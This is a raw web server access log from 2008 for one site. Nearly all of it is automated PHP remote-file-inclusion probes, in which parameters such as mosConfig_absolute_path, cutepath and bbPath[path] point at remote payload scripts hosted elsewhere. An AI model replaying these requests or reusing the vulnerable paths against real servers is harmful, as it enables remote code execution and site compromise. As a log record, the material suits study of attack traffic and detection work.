221.139.3.229 - - [15/Jun/2008:18:19:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.139.3.229 - - [15/Jun/2008:18:19:43 -0700] "GET /logs/access_071022.log//components/com_simpleboard/image_upload.php?sbp=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.6.22.159 - - [15/Jun/2008:18:19:55 -0700] "GET /wsnlinks/link.php?id=90 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:19:56 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:19:56 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:19:57 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:20:33 -0700] "GET /logs/access_071119.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:20:34 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:20:35 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:20:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:20:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:22:17 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:22:42 -0700] "GET //library/lib.php?root=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:23:34 -0700] "GET /index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
221.139.3.229 - - [15/Jun/2008:18:25:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:25:10 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:25:30 -0700] "GET /logs/access_080114.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:27:18 -0700] "GET /view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:18:27:24 -0700] "GET /logs/access_080127.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:18:27:24 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:18:27:24 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:18:27:27 -0700] "GET /logs/access_071021.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
85.17.3.183 - - [15/Jun/2008:18:27:46 -0700] "GET /index.php3?page=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
76.234.49.129 - - [15/Jun/2008:18:28:22 -0700] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.17.3.183 - - [15/Jun/2008:18:29:12 -0700] "GET /index.php3?pag=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:29:20 -0700] "GET /logs/access.log/index.php?do=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:29:21 -0700] "GET /logs/index.php?do=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:29:21 -0700] "GET /index.php?do=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.214.28.45 - - [15/Jun/2008:18:29:31 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:30:07 -0700] "GET /logs/access_071021.log/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:30:07 -0700] "GET /index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:30:08 -0700] "GET /logs/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:30:08 -0700] "GET /logs/access_070820.log/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.55.208.13 - - [15/Jun/2008:18:32:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.13 - - [15/Jun/2008:18:32:02 -0700] "GET /logs/access_080406.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
209.51.219.170 - - [15/Jun/2008:18:32:25 -0700] "GET /logs/access_080114.log//modules/xfsection/modify.php?dir_module=http://www.harmonicasdefrancefederation.org/includes/js/highlight??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [15/Jun/2008:18:32:25 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.harmonicasdefrancefederation.org/includes/js/highlight??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [15/Jun/2008:18:32:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.harmonicasdefrancefederation.org/includes/js/highlight??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [15/Jun/2008:18:32:43 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://www.harmonicasdefrancefederation.org/includes/js/highlight??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:32:49 -0700] "GET /logs/access.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:32:49 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:32:49 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:32:53 -0700] "GET /logs/access.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:32:53 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:32:53 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
65.55.208.13 - - [15/Jun/2008:18:33:26 -0700] "GET /logs/access_080324.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
209.51.219.170 - - [15/Jun/2008:18:33:48 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.harmonicasdefrancefederation.org/includes/js/highlight??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:34:01 -0700] "GET /logs/access.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:34:01 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:34:02 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:34:38 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:36:03 -0700] "GET /logs/access.log/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:36:04 -0700] "GET /logs/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
125.245.146.189 - - [15/Jun/2008:18:36:05 -0700] "GET /logs/access_080120.log/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:36:29 -0700] "GET /logs/access_080128.log/index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:36:30 -0700] "GET /index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:36:31 -0700] "GET /logs/index.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.115.47 - - [15/Jun/2008:18:37:10 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.115.47 - - [15/Jun/2008:18:37:10 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.115.47 - - [15/Jun/2008:18:37:10 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.172.184.72 - - [15/Jun/2008:18:37:20 -0700] "GET /logs/access_071231.log/modules.php?name=My_eGalleryhttp://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
203.172.184.72 - - [15/Jun/2008:18:37:20 -0700] "GET /modules.php?name=My_eGalleryhttp://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
203.172.184.72 - - [15/Jun/2008:18:37:20 -0700] "GET /logs/modules.php?name=My_eGalleryhttp://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:37:30 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:37:30 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:37:30 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.17.3.183 - - [15/Jun/2008:18:37:55 -0700] "GET /index.php3?lang=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.17.3.183 - - [15/Jun/2008:18:40:03 -0700] "GET /index.php3?id=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.86.91.115 - - [15/Jun/2008:18:42:20 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.86.91.115 - - [15/Jun/2008:18:42:20 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.86.91.115 - - [15/Jun/2008:18:42:21 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:42:26 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:42:27 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:42:28 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:42:31 -0700] "GET /logs/access_071119.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:42:31 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:42:32 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:42:51 -0700] "GET /logs/access_080210.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:42:52 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:42:52 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.132.151.8 - - [15/Jun/2008:18:42:54 -0700] "GET /logs/access_071224.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
66.132.151.8 - - [15/Jun/2008:18:42:55 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
66.132.151.8 - - [15/Jun/2008:18:42:55 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:43:27 -0700] "GET /logs/access_071210.log/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:43:27 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:43:35 -0700] "GET /logs/access_071008.log/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:43:55 -0700] "GET /logs/access.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:44:00 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:44:00 -0700] "GET /logs/access_080210.log/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:44:01 -0700] "GET /shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:44:01 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:44:04 -0700] "GET /logs/shows.inc.php?cutepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.207.65.26 - - [15/Jun/2008:18:44:21 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.207.65.26 - - [15/Jun/2008:18:44:22 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.207.65.26 - - [15/Jun/2008:18:44:22 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:18:44:29 -0700] "GET /logs/access_071224.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:18:44:30 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:18:44:30 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:18:45:13 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:45:34 -0700] "GET /logs/access_071224.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:45:34 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:45:34 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:46:23 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:46:56 -0700] "GET /logs/access_071112.log/index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:46:57 -0700] "GET /logs/index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:18:47:01 -0700] "GET /logs/access_080127.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.221.143.111 - - [15/Jun/2008:18:47:03 -0700] "GET /logs/access_070820.log/index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:18:47:57 -0700] "GET /logs/access_071224.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:18:47:57 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:18:47:58 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:48:11 -0700] "GET /logs/access_080127.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.32.194.164 - - [15/Jun/2008:18:49:23 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:49:24 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:49:28 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.43.197.73 - - [15/Jun/2008:18:49:28 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:18:49:41 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.32.194.164 - - [15/Jun/2008:18:49:44 -0700] "GET /logs/access_070903.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.26.142.244 - - [15/Jun/2008:18:49:51 -0700] "GET /logs/access_080114.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:52:33 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:52:33 -0700] "GET /logs/access.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:52:33 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
58.226.23.119 - - [15/Jun/2008:18:53:01 -0700] "GET /logs/access_080127.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:53:32 -0700] "GET /logs/access_071015.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.42.183.2 - - [15/Jun/2008:18:53:32 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
